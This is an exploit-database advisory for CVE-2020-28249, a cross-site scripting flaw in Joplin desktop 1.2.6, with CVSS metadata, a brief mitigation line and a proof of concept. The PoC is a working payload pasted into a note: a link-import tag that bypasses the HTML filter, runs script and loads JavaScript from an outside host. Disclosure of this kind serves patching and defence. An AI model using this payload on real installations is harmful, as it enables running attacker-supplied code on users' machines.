Joplin 1.2.6 - 'link' Cross Site Scripting

vendor:

Joplin

by:

Philip Holbrook

6.1

CVSS

MEDIUM

Cross Site Scripting

CWE

Product Name: Joplin

Affected Version From: 1.2.6

Affected Version To: 1.2.6

Patch Exists: YES

Related CWE: CVE-2020-28249

CPE: a:laurent_22:joplin:1.2.6

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows, Mac

2020

Joplin 1.2.6 – ‘link’ Cross Site Scripting

An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter. The payload for the exploit is <link rel=import href="data:text/html,<script>alert(XSS)</script> <script src="//brutelogic.com.br/1.js&num; </script>

Mitigation:

Ensure that all user-supplied input is properly sanitized and filtered before being used in the application.

Source

Exploit-DB raw data:

# Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting
# Date: 2020-09-21
# Exploit Author: Philip Holbrook (@fhlipZero)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6
# Version: 1.2.6
# Tested on: Windows / Mac
# CVE : CVE-2020-28249
# References:
# https://github.com/fhlip0/JopinXSS/blob/main/readme.md

# 1. Technical Details
# An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to
bypass the HTML filter

# 2. PoC
# Paste the following payload into a note:

```
<link rel=import
href="data:text/html&comma;<script>alert(XSS)<&sol;script>
<script src="//brutelogic.com.br&sol;1.js&num; </script>
```